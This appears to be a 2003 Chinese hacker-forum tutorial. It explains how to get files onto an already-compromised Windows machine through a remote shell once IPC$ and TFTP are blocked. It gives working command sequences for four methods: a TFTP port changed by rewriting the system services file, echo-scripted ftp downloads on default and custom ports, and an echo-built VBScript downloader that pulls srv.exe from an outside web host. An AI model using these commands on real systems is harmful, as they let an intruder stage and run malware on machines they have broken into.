上一篇：netstart可以启动的命令一览… >>

突破限制传输文件

突破限制传输文件道高一尺，魔高一丈...

_随着冲击波蠕虫的泛滥，互联网上限制重重，越来越不像样了。原本
正常的IPC$ 传送文件，TFTP传送文件的方法都在各种各样的网络设备
的限制下变的不可用了...又是这样那样的限制，呸，我们追求自由与
共享，我们要打破电脑集权！^_^

本文给出了几种打破这种限制的方法，当然只是抛砖引玉！

本文是居于已经得到了一个有一定权限的SHELL.用IPC$传送文件和TFTP
传送文件不可行。实现在命令行下传送文件的其他方法.

一，TFTP＋自定义端口
限制用TFTP传送文件，一般就是直接封69端口，我们在用TFTP传送
文件的时候，一般用tftp -i xxx.xxx.xxx.xxx get srv.exe来下载，TFTP
默认的是69端口，那么怎么才能改这个端口了？TFTPD32.exe等TFTP服务端
是可以自己设置端口的，这里就不多讲，只不过在设置后要重新启动一次
TFTP服务端。至于客户端
在system32driversetc文件夹下有一个services文件。打开如下：
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#

echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
...
tftp 69/udp #Trivial File Transfer
...
不难看出，69/udp就是定义tftp默认端口的，协议为udp。
好啦！具体怎么用只要这两句，其实就是比原来多加了一句改端口的：
echo tftp 8300/udp > %systemroot%system32driversetcservices
tftp -i xxx.xxx.xxx.xxx get srv.exe
注意：请先把tftp服务端端口设定为与自定义端口一样的，这里是8300。
安全点的做法:
ren %systemroot%system32driversetcservices 1
echo tftp 8300/udp >2
copy 2+%systemroot%system32driversetc1 %systemroot%system32driversetcservices

二：ftp下载文件
ftp下载文件一般步骤如下：
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo binary >>ftp.txt [可选]
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt

ftp -s:ftp.txt
del ftp.txt
这样srv.exe文件就下在下来了。

三：ftp＋自定义端口
其实ftp自定义端口非常简单，只要在ip地址后面空格，紧跟自定义的端口就可以了，如下：
echo open xxx.xxx.xxx.xxx 2121 >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo binary >>ftp.txt [可选]
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt

ftp -s:ftp.txt
del ftp.txt
这里自定义端口为2121，只要和ftp服务端的端口一致就行拉。

四：写程序下载
脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用
echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序
实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "srv.exe",2 >>webdown.vbs

然后执行cscript webdown.vbs就可以啦.其中，http://txhak.126.com/srv.exe改成你放
文件的网站路径，srv.exe可以改成保存文件的路径。

其他方法希望大家自己发现。也希望能和我讨论.
我的EMAIL：txhak@etang.com
QQ:22540685
铁血
2003.11.18

返回顶部

下一篇：安全事件日志中的事件编号与… >>